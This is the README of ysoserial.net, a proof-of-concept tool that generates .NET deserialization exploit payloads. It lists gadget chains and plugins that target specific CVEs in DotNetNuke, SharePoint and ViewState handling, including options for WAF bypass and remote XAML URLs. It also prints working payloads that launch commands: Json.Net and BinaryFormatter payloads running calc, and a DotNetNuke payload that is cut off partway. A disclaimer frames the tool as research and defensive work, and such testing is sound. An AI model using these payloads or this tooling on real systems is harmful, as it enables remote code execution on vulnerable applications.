Skip to content

pwntester/ysoserial.net

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

Files

Permalink
Failed to load latest commit information.

logo

GitHub CI v2 download license stars forks

A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization.

Description

ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath.

This project is inspired by Chris Frohoff's ysoserial project

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

This software is a personal project and not related with any companies, including Project owner and contributors employers.

Installation

In order to obtain the latest version, it is recommended to download it from the Actions page.

You can install the previous releases of YSoSerial.NET from the releases page

Usage

$ ./ysoserial.exe --fullhelp
ysoserial.net generates deserialization payloads for a variety of .NET formatters.

== GADGETS ==
	(*) ActivitySurrogateDisableTypeCheck [Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored]
		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Not bridge but derived
			Extra options:
			      --var, --variant=VALUE Choices: 1 -> use TypeConfuseDelegateGenerator 
			                               [default], 2 -> use 
			                               TextFormattingRunPropertiesMarshal
			
	(*) ActivitySurrogateSelector [This gadget ignores the command parameter and executes the constructor of ExploitClass class]
		Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
			Labels: Not bridge or derived
			Extra options:
			      --var, --variant=VALUE Payload variant number where applicable. 
			                               Choices: 1 (default), 2 (shorter but may not 
			                               work between versions)
			
	(*) ActivitySurrogateSelectorFromFile [Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
		Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
			Labels: Not bridge or derived
			Extra options:
			      --var, --variant=VALUE Payload variant number where applicable. 
			                               Choices: 1 (default), 2 (shorter but may not 
			                               work between versions)
			
	(*) AxHostState
		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) ClaimsIdentity
		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
			Labels: Bridge and derived, OnDeserialized
			Supported formatter for the bridge: BinaryFormatter
	(*) ClaimsPrincipal
		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
			Labels: Bridge and derived, OnDeserialized, SecondOrderDeserialization
			Supported formatter for the bridge: BinaryFormatter
	(*) DataSet
		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) DataSetOldBehaviour [This gadget targets and old behaviour of DataSet which uses XML format]
		Formatters: BinaryFormatter , LosFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: LosFormatter
			Extra options:
			      --spoofedAssembly=VALUE
			                             The assembly name you want to use in the 
			                               generated serialized object (example: 'mscorlib')
			
	(*) DataSetOldBehaviourFromFile [Another variant of the DataSetOldBehaviour gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
		Formatters: BinaryFormatter , LosFormatter
			Labels: Bridge and derived
			Extra options:
			      --spoofedAssembly=VALUE
			                             The assembly name you want to use in the 
			                               generated serialized object (example: 'mscorlib')
			
	(*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson or in the DataSetOldBehaviour gadget]
		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) GenericPrincipal
		Formatters: BinaryFormatter , LosFormatter
			Labels: Bridge and derived, OnDeserialized, SecondOrderDeserialization
			Supported formatter for the bridge: BinaryFormatter
			Extra options:
			      --var, --variant=VALUE Payload variant number where applicable. 
			                               Choices: 1 (uses serialized ClaimsIdentities), 2 
			                               (uses serialized Claims)
			
	(*) ObjectDataProvider
		Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
			Labels: Not bridge or derived
			Extra options:
			      --var, --variant=VALUE Payload variant number where applicable. 
			                               Choices: 1, 2, 3, ... based on formatter.
			      --xamlurl=VALUE        This is to create a very short payload when 
			                               affected box can read the target XAML URL e.g. 
			                               "http://b8.ee/x" (can be a file path on a shared 
			                               drive or the local system). This is used by the 
			                               3rd XAML payload which is a ResourceDictionary 
			                               with the Source parameter. Command parameter 
			                               will be ignored. The shorter the better!
			
	(*) ObjRef
		Formatters: BinaryFormatter , LosFormatter , ObjectStateFormatter , SoapFormatter
			Labels: 
	(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Not bridge but derived
	(*) ResourceSet
		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
			Labels: It relies on other gadgets and is not a real gadget on its own (not bridged or derived either)
			Extra options:
			      --ig, --internalgadget=VALUE
			                             The numerical internal gadget choice to use: 
			                               1=TypeConfuseDelegate, 
			                               2=TextFormattingRunProperties (default: 1 
			                               [TypeConfuseDelegate])
			
	(*) RolePrincipal
		Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) SessionSecurityToken
		Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) SessionViewStateHistoryItem
		Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: LosFormatter
	(*) TextFormattingRunProperties [This normally generates the shortest payload]
		Formatters: BinaryFormatter , DataContractSerializer , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Not bridge but derived
			Extra options:
			      --xamlurl=VALUE        This is to create a very short payload when 
			                               affected box can read the target XAML URL e.g. 
			                               "http://b8.ee/x" (can be a file path on a shared 
			                               drive or the local system). This is used by the 
			                               3rd XAML payload of ObjectDataProvider which is 
			                               a ResourceDictionary with the Source parameter. 
			                               Command parameter will be ignored. The shorter 
			                               the better!
			      --hasRootDCS           To include a root element with the 
			                               DataContractSerializer payload.
			
	(*) ToolboxItemContainer
		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) TypeConfuseDelegate
		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
			Labels: Not bridge or derived
	(*) TypeConfuseDelegateMono [Tweaked TypeConfuseDelegate gadget to work with Mono]
		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
			Labels: Not bridge or derived
	(*) WindowsClaimsIdentity [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)]
		Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializer (3) , SoapFormatter (2)
			Labels: Bridge and derived, Not in GAC
			Supported formatter for the bridge: BinaryFormatter
			Extra options:
			      --var, --variant=VALUE Payload variant number where applicable. 
			                               Choices: 1, 2, or 3 based on formatter.
			
	(*) WindowsIdentity
		Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Bridge and derived
			Supported formatter for the bridge: BinaryFormatter
	(*) WindowsPrincipal
		Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
			Labels: Bridge and derived

== PLUGINS ==
	(*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
		Options:
		  -c, --command=VALUE        the command to be executed.
		  -u, --url=VALUE            the url passed to Activator.GetObject.
		  -s                         if TCPChannel security should be enabled.
		
	(*) Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
		Options:
		  -M, --mode=VALUE           the payload mode: HttpStaticObjectsCollection or 
		                               SessionStateItemCollection. Default: 
		                               HttpStaticObjectsCollection
		  -o, --output=VALUE         the output format (raw|base64).
		  -c, --command=VALUE        the command to be executed
		  -t, --test                 whether to run payload locally. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		
	(*) ApplicationTrust (Generates XML payload for the ApplicationTrust class)
		Options:
		  -c, --command=VALUE        the command to be executed
		  -t, --test                 whether to run payload locally. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		
	(*) Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
		Options:
		  -F, --format=VALUE         the object format: Csv, DeviceIndependentBitmap, 
		                               DataInterchangeFormat, PenData, RiffAudio, 
		                               WindowsForms10PersistentObject, System.String, 
		                               SymbolicLink, TaggedImageFileFormat, WaveAudio. 
		                               Default: WindowsForms10PersistentObject (the 
		                               only one that works in Feb 2020 as a result of 
		                               an incomplete silent patch - - will not be 
		                               useful to target text based fields anymore)
		  -c, --command=VALUE        the command to be executed
		  -t, --test                 whether to run payload locally. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		
	(*) DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
		Options:
		  -m, --mode=VALUE           the payload mode: read_file, write_file, 
		                               run_command.
		  -c, --command=VALUE        the command to be executed in run_command mode.
		  -u, --url=VALUE            the url to fetch the file from in write_file 
		                               mode.
		  -f, --file=VALUE           the file to read in read_file mode or the file 
		                               to write to in write_file_mode.
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		
	(*) Resx (Generates RESX and .RESOURCES files)
		Options:
		  -M, --mode=VALUE           the payload mode: indirect_resx_file, 
		                               CompiledDotResources (useful for CVE-2020-0932 
		                               for example), BinaryFormatter, SoapFormatter.
		  -c, --command=VALUE        the command to be executed in BinaryFormatter 
		                               and CompiledDotResources. If this is provided 
		                               for SoapFormatter, it will be used as a file for 
		                               ActivitySurrogateSelectorFromFile
		  -g, --gadget=VALUE         The gadget chain used for BinaryFormatter and 
		                               CompiledDotResources (default: 
		                               TextFormattingRunProperties).
		  -F, --file=VALUE           UNC file path location: this is used in 
		                               indirect_resx_file mode.
		      --of, --outputfile=VALUE
		                             a file path location for CompiledDotResources to 
		                               store the .resources file (default: payloa-
		                               d.resources)
		  -t, --test                 Whether to run payload locally. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		
	(*) SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
		Options:
		  -c, --command=VALUE        the command to be executed e.g. "cmd /c calc"
		  -t, --test                 whether to run payload locally. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		
	(*) SharePoint (Generates payloads for the following SharePoint CVEs: CVE-2020-1147, CVE-2019-0604, CVE-2018-8421)
		Options:
		      --cve=VALUE            the CVE reference: CVE-2020-1147 (result is safe 
		                               for a POST request), CVE-2019-0604, CVE-2018-8421
		      --useurl               to use the XAML url rather than using the direct 
		                               command in CVE-2019-0604 and CVE-2018-8421
		  -g, --gadget=VALUE         a gadget chain that supports LosFormatter for 
		                               CVE-2020-1147. Default: TypeConfuseDelegate 
		  -c, --command=VALUE        the command to be executed e.g. "cmd /c calc" or 
		                               the XAML url e.g. "http://b8.ee/x" to make the 
		                               payload shorter with the `--useurl` argument
		
	(*) TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
		Options:
		  -c, --command=VALUE        the command to be executed
		  -t, --test                 whether to run payload locally. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		
	(*) ViewState (Generates a ViewState using known MachineKey parameters)
		Options:
		      --examples             to show a few examples. Other parameters will be 
		                               ignored
		  -g, --gadget=VALUE         a gadget chain that supports LosFormatter. 
		                               Default: ActivitySurrogateSelector
		  -c, --command=VALUE        the command suitable for the used gadget (will 
		                               be ignored for ActivitySurrogateSelector)
		      --upayload=VALUE       the unsigned LosFormatter payload in (base64 
		                               encoded). The gadget and command parameters will 
		                               be ignored
		      --generator=VALUE      the __VIEWSTATEGENERATOR value which is in HEX, 
		                               useful for .NET <= 4.0. When not empty, 'legacy' 
		                               will be used and 'path' and 'apppath' will be 
		                               ignored.
		      --path=VALUE           the target web page. example: /app/folder1/pag-
		                               e.aspx
		      --apppath=VALUE        the application path. this is needed in order to 
		                               simulate TemplateSourceDirectory
		      --islegacy             when provided, it uses the legacy algorithm 
		                               suitable for .NET 4.0 and below
		      --isencrypted          this will be used when the legacy algorithm is 
		                               used to bypass WAFs
		      --viewstateuserkey=VALUE
		                             this to set the ViewStateUserKey parameter that 
		                               sometimes used as the anti-CSRF token
		      --decryptionalg=VALUE  the encryption algorithm can be set to  DES, 
		                               3DES, AES. Default: AES
		      --decryptionkey=VALUE  this is the decryptionKey attribute from 
		                               machineKey in the web.config file
		      --validationalg=VALUE  the validation algorithm can be set to SHA1, 
		                               HMACSHA256, HMACSHA384, HMACSHA512, MD5, 3DES, 
		                               AES. Default: HMACSHA256
		      --validationkey=VALUE  this is the validationKey attribute from 
		                               machineKey in the web.config file
		      --showraw              to stop URL-encoding the result. Default: false
		      --minify               Whether to minify the payloads where applicable 
		                               (experimental). Default: false
		      --ust, --usesimpletype This is to remove additional info only when 
		                               minifying and FormatterAssemblyStyle=Simple. 
		                               Default: true
		      --isdebug              to show useful debugging messages!
		

Note: Machine authentication code (MAC) key modifier is not being used for LosFormatter in ysoserial.net. Therefore, LosFormatter (base64 encoded) can be used to create ObjectStateFormatter payloads.

Usage: ysoserial.exe [options]
Options:
  -p, --plugin=VALUE         The plugin to be used.
  -o, --output=VALUE         The output format (raw|base64|raw-
                               urlencode|base64-urlencode|hex). Default: raw
  -g, --gadget=VALUE         The gadget chain.
  -f, --formatter=VALUE      The formatter.
  -c, --command=VALUE        The command to be executed.
      --rawcmd               Command will be executed as is without `cmd /c ` 
                               being appended (anything after first space is an 
                               argument).
  -s, --stdin                The command to be executed will be read from 
                               standard input.
      --bgc, --bridgedgadgetchains=VALUE
                             Chain of bridged gadgets separated by comma (,). 
                               Each gadget will be used to complete the next 
                               bridge gadget. The last one will be used in the 
                               requested gadget. This will be ignored when 
                               using the searchformatter argument.
  -t, --test                 Whether to run payload locally. Default: false
      --outputpath=VALUE     The output file path. It will be ignored if 
                               empty.
      --minify               Whether to minify the payloads where applicable. 
                               Default: false
      --ust, --usesimpletype This is to remove additional info only when 
                               minifying and FormatterAssemblyStyle=Simple 
                               (always `true` with `--minify` for binary 
                               formatters). Default: true
      --raf, --runallformatters
                             Whether to run all the gadgets with the provided 
                               formatter (ignores gadget name, output format, 
                               and the test flag arguments). This will search 
                               in formatters and also show the displayed 
                               payload length. Default: false
      --sf, --searchformatter=VALUE
                             Search in all formatters to show relevant 
                               gadgets and their formatters (other parameters 
                               will be ignored).
      --debugmode            Enable debugging to show exception errors and 
                               output length
  -h, --help                 Shows this message and exit.
      --fullhelp             Shows this message + extra options for gadgets 
                               and plugins and exit.
      --credit               Shows the credit/history of gadgets and plugins 
                               (other parameters will be ignored).
      --runmytest            Runs that `Start` method of `TestingArenaHome` - 
                               useful for testing and debugging.

Note: When specifying complex commands, it can be tedious to escape some special character (;, |, &, ..). Use stdin option (-s) to read the command from stdin:

cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s

Note: XmlSerializer and DataContractSerializer formatters generate a wrapper Xml format including the expected type on the "type" attribute of the root node, as used, for example, in DotNetNuke. You may need to modify the generated xml based on how XmlSerializer gets the expected type in your case.

Plugins

Ysoserial.Net can be used to generate raw payloads or more complex ones using a plugin architecture. To use plugins, use -p <plugin name> followed by the plugin options (the rest of ysoserial.net options will be ignored). Eg:

$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini

For more help on plugin options use -h along with -p <plugin name>. Eg:

$ ./ysoserial.exe -h -p DotNetNuke

ysoserial.net generates deserialization payloads for a variety of .NET formatters.

Plugin:

DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)

Options:

  -m, --mode=VALUE           the payload mode: read_file, write_file, run_command.
  -c, --command=VALUE        the command to be executed in run_command mode.
  -u, --url=VALUE            the url to fetch the file from in write_file mode.
  -f, --file=VALUE           the file to read in read_file mode or the file to write to in write_file_mode.
      --minify               Whether to minify the payloads where applicable (experimental). Default: false
      --ust, --usesimpletype This is to remove additional info only when minifying and FormatterAssemblyStyle=Simple. Default: true

Examples

Generate a calc.exe payload for Json.Net using ObjectDataProvider gadget.

$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/ccalc']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Generate a calc.exe payload for BinaryFormatter using PSObject gadget.

$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t

AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZsdDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs=

Generate a run_command payload for DotNetNuke using its plugin

$ ./ysoserial.exe -p DotNetNuke -M run_command -C calc.exe

<profile><item key="foo" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider xmlns:xsd=" [http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema) " xmlns:xsi=" [http://www.w3.org/2001/XMLSchema-instance](http://www.w3.org/2001/XMLSchema-instance) "><ExpandedElement/><ProjectedProperty0><MethodName>Deserialize</MethodName><MethodParameters><anyType xsi:type="xsd:string">/wEyxBEAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAACy9jIGNhbGMuZXhlBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGV